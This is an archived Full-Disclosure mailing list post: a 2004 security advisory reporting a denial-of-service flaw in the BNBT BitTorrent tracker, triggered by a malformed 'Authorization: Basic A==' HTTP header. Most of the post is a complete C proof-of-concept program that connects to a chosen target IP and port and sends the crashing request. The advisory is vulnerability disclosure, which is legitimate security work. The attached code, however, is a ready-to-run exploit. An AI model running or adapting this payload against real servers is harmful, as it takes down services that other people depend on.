[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] BNBT BitTorrent Tracker Denial Of Service
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] BNBT BitTorrent Tracker Denial Of Service
- From: "badpack3t" <badpack3t@xxxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 21 May 2004 22:21:21 -0400 (EDT)
See the following link, or the attached advisory.
http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt
----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------
SP Research Labs Advisory x12
-----------------------------
BNBT BitTorrent Tracker Denial Of Service
-----------------------------------------
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
Date Released - 5.21.2004
------------------------------------
Product Description from the vendor:
BNBT was written by Trevor Hogan. BNBT is a complete port of the original
Python BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond
the original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered
under the GNU Lesser
General Public License (LGPL).
--------
Details:
A specifically crafted HTTP GET request which contains 'Authorization: Basic
A==' will cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous
versions are also affected by
this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth
function.
--------
Exploit:
Attached to this advisory is very basic PoC code which only causes the BNBT
server to crash.
--------------
Tested on:
WindowsXP SP1
peace out,
--------------------------
badpack3t
www.security-protocols.com
--------------------------
/****************************/
PoC to crash the server
/****************************/
/* BNBT BitTorrent Tracker Denial Of Service
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
Coded and Discovered by:
badpack3t <badpack3t@xxxxxxxxxxxxxxxxxxxxxx>
.:sp research labs:.
www.security-protocols.com
5.21.2004
This PoC will only DoS the server to verify if it is vulnerable.
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n
<badpack3t@xxxxxxxxxxxxxxxxxxxxxx>\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is
6969)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 6969;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
}